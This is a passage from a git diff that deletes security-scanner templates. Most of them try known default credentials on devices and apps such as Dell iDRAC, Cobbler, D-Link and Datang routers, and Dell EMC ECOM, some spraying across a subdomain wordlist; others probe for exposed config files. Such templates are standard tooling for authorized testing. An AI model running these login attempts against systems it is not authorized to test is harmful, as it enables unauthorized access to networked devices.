- body: frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=
- follow_redirects: false
- expression: response.status == 302 && response.headers["location"] == "/menu.gch"
-expression: r0()
-detail: {}
diff --git a/tmp/default/cobbler-default-login.yaml b/tmp/default/cobbler-default-login.yaml
deleted file mode 100644
index 4b971faf6b..0000000000
--- a/tmp/default/cobbler-default-login.yaml
+++ /dev/null
@@ -1,65 +0,0 @@
-id: cobbler-default-login
-
-info:
- name: Cobbler Default Login
- author: c-sh0
- severity: high
- verified: true
- description: Cobbler default login credentials for the testing module (testing/testing) were discovered. fofa "Cobbler"
- reference:
- - https://seclists.org/oss-sec/2022/q1/146
- - https://github.com/cobbler/cobbler/issues/2307
- - https://github.com/cobbler/cobbler/issues/2909
-
-rules:
- r0:
- request:
- method: POST
- path: /cobbler_api
- headers:
- Content-Type: text/xml
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- body: |
-
-
- login
-
-
-
- cobbler
-
-
-
-
- cobbler
-
-
-
-
- expression: response.status == 200 && "(.*[a-zA-Z0-9].+==)".bmatches(response.body) && response.raw_header.bcontains(b'text/xml')
- r1:
- request:
- method: POST
- path: /cobbler_api
- headers:
- Content-Type: text/xml
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- body: |
-
-
- login
-
-
-
- testing
-
-
-
-
- testing
-
-
-
-
- expression: response.status == 200 && "(.*[a-zA-Z0-9].+==)".bmatches(response.body) && response.raw_header.bcontains(b'text/xml')
-expression: r0() || r1()
\ No newline at end of file
diff --git a/tmp/default/cs141-default-login.yaml b/tmp/default/cs141-default-login.yaml
deleted file mode 100644
index 4dacd946b2..0000000000
--- a/tmp/default/cs141-default-login.yaml
+++ /dev/null
@@ -1,57 +0,0 @@
-id: cs141-default-login
-
-info:
- name: UPS Adapter CS141 SNMP Module Default Login
- author: socketz
- severity: medium
- description: UPS Adapter CS141 SNMP Module default login credentials were discovered.
- reference:
- - https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
- classification:
- cwe-id: CWE-798
- metadata:
- max-request: 3
- shodan-query: http.html:"CS141"
- tags: hiawatha,iot,default-login
-
-http:
- - raw:
- - |
- POST /api/login HTTP/1.1
- Host: {{Hostname}}
- Accept: application/json, text/plain, */*
- Content-Type: application/json
-
- {"userName":"{{user}}","password":"{{pass}}"}
-
- attack: pitchfork
- payloads:
- user:
- - admin
- - engineer
- - guest
- pass:
- - cs141-snmp
- - engineer
- - guest
- stop-at-first-match: true
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'accessToken'
- - 'application/json'
- condition: and
- part: header
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: kval
- kval:
- - accessToken
-
-# digest: 4a0a00473045022100d7669b05e2b655bf42189bd5a1f1c6d312b55ef0f2226d74125a06af7716cb4c02200e5bbd064a3fa4485e6a2e29f0df4dae44e75252a08137974489591ca8e284c5:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/datang-ac-default-password-cnvd-2021-04128.yaml b/tmp/default/datang-ac-default-password-cnvd-2021-04128.yaml
deleted file mode 100644
index df3d74d6b3..0000000000
--- a/tmp/default/datang-ac-default-password-cnvd-2021-04128.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: poc-yaml-datang-ac-default-password-cnvd-2021-04128
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /login.cgi
- body: user=admin&password1=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&password=123456&Submit=%E7%AB%8B%E5%8D%B3%E7%99%BB%E5%BD%95
- follow_redirects: false
- expression: response.status == 200 && response.headers["set-cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_")
-expression: r0()
-detail:
- author: B1anda0(https://github.com/B1anda0)
- links:
- - https://www.cnvd.org.cn/flaw/show/CNVD-2021-04128
diff --git a/tmp/default/datang-ac-default-password.yaml b/tmp/default/datang-ac-default-password.yaml
deleted file mode 100644
index c5c49331e8..0000000000
--- a/tmp/default/datang-ac-default-password.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: datang-ac-default-password
-
-info:
- name: Datang AC Default Password
- author: B1anda0(https://github.com/B1anda0)
- severity: high
- verified: true
- description: body="大唐电信科技股份公司"
-
-rules:
- r0:
- request:
- method: POST
- path: /login.cgi
- body: user=admin&password1=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&password=123456&Submit=%E7%AB%8B%E5%8D%B3%E7%99%BB%E5%BD%95
- expression: response.status == 200 && response.headers["set-cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_")
-expression: r0()
-
diff --git a/tmp/default/default-apache-test-all.yaml b/tmp/default/default-apache-test-all.yaml
deleted file mode 100644
index bb996ae568..0000000000
--- a/tmp/default/default-apache-test-all.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: default-apache-test-all
-
-info:
- name: Apache HTTP Server Test Page
- author: andydoering
- severity: info
- description: Detects default installations of apache (not just apache2 or installations on CentOS)
- metadata:
- shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works"
- tags: tech,apache
- mongoid: 0000
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
-
- matchers:
- - type: regex # type of the extractor
- part: body # part of the response (header,body,all)
- condition: or
- regex:
- - ".*?Apache(|\\d+) .*?(Default|Test).*?"
- - "(Default|Test).*? Apache(|\\d+).*?"
-
- extractors:
- - type: kval
- part: header
- kval:
- - server
diff --git a/tmp/default/default-apache-test-page.yaml b/tmp/default/default-apache-test-page.yaml
deleted file mode 100644
index 51bf341c7e..0000000000
--- a/tmp/default/default-apache-test-page.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: default-apache-test-page
-
-info:
- name: Apache HTTP Server Test Page
- author: dhiyaneshDk
- severity: info
- metadata:
- shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS"
- tags: tech,apache
- mongoid: 0000
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
-
- matchers:
- - type: word
- words:
- - "Apache HTTP Server Test Page powered by CentOS"
- part: body
diff --git a/tmp/default/default-apache2-page.yaml b/tmp/default/default-apache2-page.yaml
deleted file mode 100644
index 0a63bec4b8..0000000000
--- a/tmp/default/default-apache2-page.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: default-apache2-page
-
-info:
- name: Apache2 Default Test Page
- author: dhiyaneshDk
- severity: info
- metadata:
- shodan-query: http.title:"Apache2 Debian Default Page:"
- tags: tech,apache
- mongoid: 0000
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
-
- matchers:
- - type: word
- words:
- - "Apache2 Debian Default Page: It works"
- part: body
diff --git a/tmp/default/default-apache2-ubuntu-page.yaml b/tmp/default/default-apache2-ubuntu-page.yaml
deleted file mode 100644
index 8f018edcc9..0000000000
--- a/tmp/default/default-apache2-ubuntu-page.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: default-apache2-ubuntu-page
-
-info:
- name: Apache2 Ubuntu Default Page
- author: dhiyaneshDk
- severity: info
- metadata:
- shodan-query: http.title:"Apache2 Ubuntu Default Page"
- tags: tech,apache
- mongoid: 0000
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- matchers:
- - type: word
- words:
- - "Apache2 Ubuntu Default Page: It works"
- part: body
diff --git a/tmp/default/default-asp.net-page.yaml b/tmp/default/default-asp.net-page.yaml
deleted file mode 100644
index 83ff89ae39..0000000000
--- a/tmp/default/default-asp.net-page.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: default-asp.net-page
-
-info:
- name: ASP.Net Test Page
- author: dhiyaneshDk
- severity: info
- tags: tech,asp
- reference: https://www.shodan.io/search?query=http.title%3A%22Home+Page+-+My+ASP.NET+Application%22
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET / HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
-
- matchers:
- - type: word
- words:
- - "Home Page - My ASP.NET Application"
- part: body
\ No newline at end of file
diff --git a/tmp/default/default-config-6835.yaml b/tmp/default/default-config-6835.yaml
deleted file mode 100644
index 4646ec9578..0000000000
--- a/tmp/default/default-config-6835.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-id: Config file exposure
-
-info:
- name: Config file exposure
- description: This template can be used to detect config files containing sensitive information.
- author: rahulkadavil
- severity: Low
- tags: exposure
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/sftp-config.json"
- - "{{BaseURL}}/user-config.json"
- - "{{BaseURL}}/ssh-config.json"
- - "{{BaseURL}}/database-config.json"
- - "{{BaseURL}}/config.json"
- - "{{BaseURL}}/git_config.json"
-
- matchers-condition: or
- matchers:
- - type: word
- words:
- - "sftp_password"
- - "ftp_password"
- - "ssh_password"
- - "ssh_username"
- - "credentials:"
- - "DB_NAME"
- - "DB_USER"
- - "DB_PASSWORD"
- - "ADMIN_PASSWORD"
- condition: or
- part: body
- - type: status
- status:
- - 200
-
diff --git a/tmp/default/default-config.yaml b/tmp/default/default-config.yaml
deleted file mode 100644
index f8a4f045f7..0000000000
--- a/tmp/default/default-config.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: Config file exposure
-info:
- name: Config file exposure
- description: This template can be used to detect config files containing sensitive information.
- author: rahulkadavil
- severity: Low
- tags: exposure
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/sftp-config.json"
- - "{{BaseURL}}/user-config.json"
- - "{{BaseURL}}/ssh-config.json"
- - "{{BaseURL}}/database-config.json"
- - "{{BaseURL}}/config.json"
- matchers-condition: or
- matchers:
- - type: word
- words:
- - "sftp_password"
- - "ftp_password"
- - "ssh_password"
- - "ssh_username"
- - "credentials:"
- - "DB_NAME"
- - "DB_USER"
- - "DB_PASSWORD"
- - "ADMIN_PASSWORD"
- condition: or
- part: body
- - type: status
- status:
- - 200
diff --git a/tmp/default/default-ibm-http-server.yaml b/tmp/default/default-ibm-http-server.yaml
deleted file mode 100644
index 2492c6ce7d..0000000000
--- a/tmp/default/default-ibm-http-server.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: default-ibm-http-server
-
-info:
- name: Default IBM HTTP Server
- author: dhiyaneshDK
- severity: info
- reference: https://www.shodan.io/search?query=http.title%3A%22IBM-HTTP-Server%22
- tags: tech,ibm
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET / HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'IBM HTTP Server'
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/tmp/default/default-iis7-page.yaml b/tmp/default/default-iis7-page.yaml
deleted file mode 100644
index 107c55bd21..0000000000
--- a/tmp/default/default-iis7-page.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: default-iis7-page
-
-info:
- name: IIS-7 Default Page
- author: dhiyaneshDk
- severity: info
- metadata:
- shodan-query: http.title:"IIS7"
- tags: tech,iis
- mongoid: 0000
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- matchers:
- - type: word
- words:
- - "IIS7"
- part: body
diff --git a/tmp/default/default-microsoft-azure-page.yaml b/tmp/default/default-microsoft-azure-page.yaml
deleted file mode 100644
index da72fae556..0000000000
--- a/tmp/default/default-microsoft-azure-page.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: default-microsoft-azure-page
-
-info:
- name: Microsoft Azure Default Page
- author: dhiyaneshDk
- severity: info
- metadata:
- shodan-query: http.title:"Microsoft Azure App Service - Welcome"
- tags: tech,azure,microsoft
- mongoid: 0000
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- matchers:
- - type: word
- words:
- - "Microsoft Azure App Service - Welcome"
- part: body
diff --git a/tmp/default/default-nginx-page.yaml b/tmp/default/default-nginx-page.yaml
deleted file mode 100644
index 6725406371..0000000000
--- a/tmp/default/default-nginx-page.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: default-nginx-page
-
-info:
- name: Nginx Default Test Page
- author: dhiyaneshDk
- severity: info
- metadata:
- shodan-query: http.title:"Welcome to nginx!"
- tags: tech,nginx
- mongoid: 0000
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- matchers:
- - type: word
- words:
- - "Welcome to nginx!"
- part: body
diff --git a/tmp/default/default-payara-server-page.yaml b/tmp/default/default-payara-server-page.yaml
deleted file mode 100644
index e69de29bb2..0000000000
diff --git a/tmp/default/default-release.yml b/tmp/default/default-release.yml
deleted file mode 100644
index 1a6e75aa8b..0000000000
--- a/tmp/default/default-release.yml
+++ /dev/null
@@ -1,140 +0,0 @@
-# The way this works is the following:
-#
-# The create-release job runs purely to initialize the GitHub release itself
-# and to output upload_url for the following job.
-#
-# The build-release job runs only once create-release is finished. It gets the
-# release upload URL from create-release job outputs, then builds the release
-# executables for each supported platform and attaches them as release assets
-# to the previously created release.
-#
-# The key here is that we create the release only once.
-#
-# Reference:
-# https://eugene-babichenko.github.io/blog/2020/05/09/github-actions-cross-platform-auto-releases/
-
-name: default-release
-on:
- workflow_call:
- workflow_dispatch:
-
-env:
- BIN_NAME: observer_ward
-jobs:
- build-release:
- name: build-release
- strategy:
- fail-fast: false
- matrix:
- build: [linux, macos, macos_m1, win-msvc, linux-arm-v7, linux-aarch64]
- include:
- - build: linux
- os: ubuntu-latest
- rust: stable
- target: x86_64-unknown-linux-musl
- file: observer_ward_amd64
- - build: macos
- os: macos-latest
- rust: stable
- target: x86_64-apple-darwin
- file: observer_ward_darwin
- - build: macos_m1
- os: macos-latest
- rust: stable
- target: aarch64-apple-darwin
- file: observer_ward_aarch64_darwin
- - build: win-msvc
- os: windows-latest
- rust: stable
- target: i686-pc-windows-msvc
- file: observer_ward.exe
- - build: linux-arm-v7
- os: ubuntu-latest
- rust: stable
- target: armv7-unknown-linux-gnueabihf
- file: observer_ward_armv7
- - build: linux-aarch64
- os: ubuntu-latest
- rust: stable
- target: aarch64-unknown-linux-gnu
- file: observer_ward_aarch64
- runs-on: ${{ matrix.os }}
- steps:
- - name: Checkout repository
- uses: actions/checkout@v2
- with:
- fetch-depth: 1
- - name: Cache
- uses: Swatinem/rust-cache@v1
- - name: Install packages (Ubuntu)
- if: matrix.os == 'ubuntu-latest'
- run: |
- sudo apt-get update
- sudo apt-get install -y gcc-multilib xz-utils liblz4-tool libc6-dev libssl-dev musl-tools pkg-config patchelf
- sudo apt-get install -y gcc-aarch64-linux-gnu gcc-arm-linux-gnueabihf
- sed -i -e "s/^version = .*/version = \"`date +'%-Y.%-m.%-d'`\"/" observer_ward/Cargo.toml
- sed -i -e "s/\"observer_ward version\"/\"observer_ward v`date +'%-Y.%-m.%-d'`\"/" observer_ward/src/cli.rs
- - name: Cache Choco
- if: matrix.os == 'windows-latest'
- uses: actions/cache@v4
- with:
- path: ${{ github.workspace }}\choco-cache
- key: ${{ runner.os }}-temp-cache
- - name: Install packages (Windows)
- if: matrix.os == 'windows-latest'
- shell: bash
- run: |
- choco config set cacheLocation "${{ github.workspace }}\choco-cache"
- choco install llvm openssl
- export CARGO_PKG_VERSION=`date +'%-Y.%-m.%-d'`
- sed -i -e "s/^version = .*/version = \"`date +'%-Y.%-m.%-d'`\"/" observer_ward/Cargo.toml
- sed -i -e "s/\"observer_ward version\"/\"observer_ward v`date +'%-Y.%-m.%-d'`\"/" observer_ward/src/cli.rs
- echo "CARGO_PKG_VERSION=`date +'%Y.%m.%d'`" >>$GITHUB_ENV
- echo "OPENSSL_DIR=C:\Program Files\OpenSSL-Win64" >>$GITHUB_ENV
- echo "RUSTFLAGS=-C target-feature=+crt-static" >>$GITHUB_ENV
- - name: Install packages (Macos)
- if: matrix.os == 'macos-latest'
- run: |
- sed -i -e "s/^version = .*/version = \"`date +'%-Y.%-m.%-d'`\"/" observer_ward/Cargo.toml
- sed -i -e "s/\"observer_ward version\"/\"observer_ward v`date +'%-Y.%-m.%-d'`\"/" observer_ward/src/cli.rs
- - name: Install Rust
- uses: actions-rs/toolchain@v1
- with:
- toolchain: ${{ matrix.rust }}
- profile: minimal
- override: true
- target: ${{ matrix.target }}
- - name: Build release binary
- run: cargo build --target ${{ matrix.target }} --verbose --release
- - name: Build archive
- shell: bash
- run: |
- if [ "${{ matrix.os }}" = "windows-latest" ]; then
- bin_file="target/${{ matrix.target }}/release/${{ env.BIN_NAME }}.exe"
- echo "BIN_FILE=$bin_file" >> $GITHUB_ENV
- else
- bin_file="target/${{ matrix.target }}/release/${{ env.BIN_NAME }}"
- echo "BIN_FILE=$bin_file" >> $GITHUB_ENV
- fi
- - name: Install Cargo deb (Ubuntu)
- if: matrix.os == 'ubuntu-latest'
- run: |
- cargo install cargo-deb
- cargo deb --target ${{ matrix.target }} --output target/${{ matrix.target }}/debian/observer-ward_${{ matrix.target }}.deb
- - name: Upload deb to release
- if: matrix.os == 'ubuntu-latest'
- uses: svenstaro/upload-release-action@v1-release
- with:
- repo_token: ${{ secrets.GITHUB_TOKEN }}
- file: target/${{ matrix.target }}/debian/observer-ward_${{ matrix.target }}.deb
- asset_name: observer-ward_${{ matrix.target }}.deb
- tag: defaultv4
- overwrite: true
- - name: Upload binary to release
- uses: svenstaro/upload-release-action@v1-release
- with:
- repo_token: ${{ secrets.GITHUB_TOKEN }}
- file: ${{ env.BIN_FILE }}
- asset_name: ${{ matrix.file }}
- tag: defaultv4
- overwrite: true
diff --git a/tmp/default/default-tomcat-page.yaml b/tmp/default/default-tomcat-page.yaml
deleted file mode 100644
index 132ac4f991..0000000000
--- a/tmp/default/default-tomcat-page.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: default-tomcat-page
-
-info:
- name: Tomcat Default Page
- author: dhiyaneshDk
- severity: info
- tags: tech,tomcat
- reference: https://www.shodan.io/search?query=http.title%3A%22Apache+Tomcat%22
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET / HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
-
- matchers:
- - type: word
- words:
- - "Apache Tomcat"
- part: body
\ No newline at end of file
diff --git a/tmp/default/default-windows-server-page.yaml b/tmp/default/default-windows-server-page.yaml
deleted file mode 100644
index e90b7e1f0d..0000000000
--- a/tmp/default/default-windows-server-page.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: default-windows-server-page
-
-info:
- name: IIS Windows Server Default Page
- author: dhiyaneshDk
- severity: info
- metadata:
- shodan-query: http.title:"IIS Windows Server"
- tags: tech,windows,iis
- mongoid: 0000
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- matchers:
- - type: word
- words:
- - "IIS Windows Server"
- part: body
diff --git a/tmp/default/default.yaml b/tmp/default/default.yaml
deleted file mode 100644
index 5f89e6b16f..0000000000
--- a/tmp/default/default.yaml
+++ /dev/null
@@ -1,59 +0,0 @@
-report:
- slack:
- channel:
- token:
-
- acunetix:
- host:
- port:
- token:
-
-settings:
- nuclei:
- enable: true
- interval: 86400 # rescan all targets in the watch list every 24h
- options: -impact high
-
- scan:
- timeout: 0 # global timeout for ALL tools in SECONDS, 0 = unlimited
-
-subfinder:
- cmd: ./thirdparty/subfinder/subfinder -d {target} -all -t {threads} -config {config} -o {output} -v
- health: ./thirdparty/subfinder/subfinder --version
- formats:
- config: config/thirdparty/subfinder.yaml
- threads: 300
-
-dnsrecon:
- cmd: python3 thirdparty/dnsrecon/dnsrecon.py -d {target} -D {wordlist} -t brt --threads {threads} -c {output}
- health: python3 thirdparty/dnsrecon/dnsrecon.py -h
- formats:
- threads: 300
- wordlist: wordlists/all.txt
-
-dnscan:
- cmd: python3 thirdparty/dnscan/dnscan.py -d {target} -w {wordlist} -o {output} -R 8.8.8.8
- health: python3 thirdparty/dnscan/dnscan.py -h
- formats:
- threads: 300
- wordlist: wordlists/subdomains-top1mil.txt
-
-sublist3r:
- cmd: python3 thirdparty/sublist3r/sublist3r.py -d {target} -t {threads} -o {output} -v
- health: python3 thirdparty/sublist3r/sublist3r.py -h
- formats:
- threads: 300
-
-amass:
- cmd: ./thirdparty/amass/amass enum -passive -d {target} -o {output} -aw {alterations} -w {wordlist}
- health: ./thirdparty/amass/amass --version
- formats:
- wordlist: wordlists/subdomains-top1mil.txt
- alterations: wordlists/alterations.txt
-
-aiodnsbrute:
- cmd: cd thirdparty && python3 -m aiodnsbrute.cli {target} -w ../{wordlist} -f ../{output} -o csv -t {threads}
- health: cd thirdparty && python3 -m aiodnsbrute.cli --help
- formats:
- threads: 1024
- wordlist: wordlists/mix.txt
\ No newline at end of file
diff --git a/tmp/default/dell-emc-ecom-default-credentials-6917.yaml b/tmp/default/dell-emc-ecom-default-credentials-6917.yaml
deleted file mode 100644
index e96bbd2928..0000000000
--- a/tmp/default/dell-emc-ecom-default-credentials-6917.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: dell-emc-ecom-default-credentials
-info:
- name: Dell EMC ECOM Default Credentials
- author: Techryptic (@Tech)
- severity: high
- description: Default Credentials of admin:#1Password on Dell EMC ECOM application.
- reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
- tags: dell,emc,ecom,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET / HTTP/1.1
- Host: {{Subdomains}}
- Authorization: Basic YWRtaW46IzFQYXNzd29yZA==
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Set-Cookie: ECOMSecurity"
- part: header
- - type: word
- words:
- - "Welcome to ECOM"
- - type: status
- status:
- - 200
diff --git a/tmp/default/dell-emc-ecom-default-credentials.yaml b/tmp/default/dell-emc-ecom-default-credentials.yaml
deleted file mode 100644
index 5e3544508a..0000000000
--- a/tmp/default/dell-emc-ecom-default-credentials.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: dell-emc-ecom-default-credentials
-
-info:
- name: Dell EMC ECOM Default Credentials
- author: Techryptic (@Tech)
- severity: high
- description: Default Credentials of admin:#1Password on Dell EMC ECOM application.
- reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
- tags: dell,emc,ecom,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET / HTTP/1.1
- Host: {{Subdomains}}
- Authorization: Basic YWRtaW46IzFQYXNzd29yZA==
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Set-Cookie: ECOMSecurity"
- part: header
-
- - type: word
- words:
- - "Welcome to ECOM"
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/tmp/default/dell-idrac-default-login-6944.yaml b/tmp/default/dell-idrac-default-login-6944.yaml
deleted file mode 100644
index 3932715542..0000000000
--- a/tmp/default/dell-idrac-default-login-6944.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: dell-idrac-default-login
-info:
- name: Dell iDRAC6/7/8 Default login
- author: kophjager007
- severity: high
- tags: dell,idrac,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /data/login HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
- Content-Type: application/x-www-form-urlencode
- Referer: "{{Subdomains}}/login.html"
-
- user=root&password=calvin
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - 0
diff --git a/tmp/default/dell-idrac-default-login.yaml b/tmp/default/dell-idrac-default-login.yaml
deleted file mode 100644
index 1e83633eb0..0000000000
--- a/tmp/default/dell-idrac-default-login.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: dell-idrac-default-login
-info:
- name: Dell iDRAC6/7/8 Default login
- author: kophjager007
- severity: high
- tags: dell,idrac,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /data/login HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
- Content-Type: application/x-www-form-urlencode
- Referer: "{{Subdomains}}/login.html"
-
- user=root&password=calvin
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - 0
diff --git a/tmp/default/dell-idrac9-default-login-6931.yaml b/tmp/default/dell-idrac9-default-login-6931.yaml
deleted file mode 100644
index 01ff17c18c..0000000000
--- a/tmp/default/dell-idrac9-default-login-6931.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: dell-idrac9-default-login
-info:
- name: DELL iDRAC9 Default Login
- author: kophjager007,milo2012
- severity: high
- tags: dell,idrac,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /sysmgmt/2015/bmc/session HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0
- Accept: application/json, text/plain, */*
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- User: "root"
- Password: "calvin"
- Content-Length: 0
- Connection: close
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 201
- - 200
- condition: or
- - type: word
- part: body
- words:
- - '"authResult":0'
diff --git a/tmp/default/dell-idrac9-default-login.yaml b/tmp/default/dell-idrac9-default-login.yaml
deleted file mode 100644
index a917b242da..0000000000
--- a/tmp/default/dell-idrac9-default-login.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-id: dell-idrac9-default-login
-
-info:
- name: DELL iDRAC9 Default Login
- author: kophjager007,milo2012
- severity: high
- tags: dell,idrac,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /sysmgmt/2015/bmc/session HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0
- Accept: application/json, text/plain, */*
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- User: "root"
- Password: "calvin"
- Content-Length: 0
- Connection: close
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 201
- - 200
- condition: or
-
- - type: word
- part: body
- words:
- - '"authResult":0'
diff --git a/tmp/default/dell-idrac9-default-password.yaml b/tmp/default/dell-idrac9-default-password.yaml
deleted file mode 100644
index d488f96a36..0000000000
--- a/tmp/default/dell-idrac9-default-password.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: dell-idrac9-default-password
-
-info:
- name: DELL iDRAC9 Default Login
- author: kophjager007,milo2012
- severity: high
- verified: false
-
-rules:
- r0:
- request:
- method: POST
- path: /sysmgmt/2015/bmc/session
- headers:
- User: root
- Password: calvin
- expression: (response.status == 201 || response.status == 200) && response.body.bcontains(b'"authResult":0')
-expression: r0()
diff --git a/tmp/default/dlink-ac-default-password.yaml b/tmp/default/dlink-ac-default-password.yaml
deleted file mode 100644
index 497abeff87..0000000000
--- a/tmp/default/dlink-ac-default-password.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: dlink-ac-default-password
-
-info:
- name: D-Link AC管理系统默认账号密码
- author: jijue
- severity: high
- verified: false
- description: |
- D-Link AC管理系统存在默认账号密码,可被获取敏感信息
- "AC集中管理平台" && body="D-Link路由器管理页"
-
-rules:
- r0:
- request:
- method: POST
- path: /login.cgi?set_language=CN
- body: user=admin&password=admin&selectLanguage=CN&Submit=%E7%99%BB%E9%99%86
- expression: response.status == 200 && response.body.bcontains(b"window.open('index.htm?_") && response.raw_header.ibcontains(b"set-cookie")
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/dlink-default-password.yaml b/tmp/default/dlink-default-password.yaml
deleted file mode 100644
index 53c080b57c..0000000000
--- a/tmp/default/dlink-default-password.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: dlink-default-password
-
-info:
- name: DLink Default Password
- author: zan8in
- severity: high
- verified: true
-
-set:
- username: admin
- password: admin
-rules:
- r0:
- request:
- method: POST
- path: /login.cgi
- body: tm=1647092159.427&user={{username}}&password={{password}}&selectLanguage=CH&OKBTN=%E7%99%BB%E5%BD%95
- expression: response.status == 200 && response.body.bcontains(b"window.open('index.htm?")
-expression: r0()
-
diff --git a/tmp/default/dolphinscheduler-default-login.yaml b/tmp/default/dolphinscheduler-default-login.yaml
deleted file mode 100755
index e13ee23fdb..0000000000
--- a/tmp/default/dolphinscheduler-default-login.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: dolphinscheduler-default-login
-info:
- name: Apache DolphinScheduler Default Login
- author:
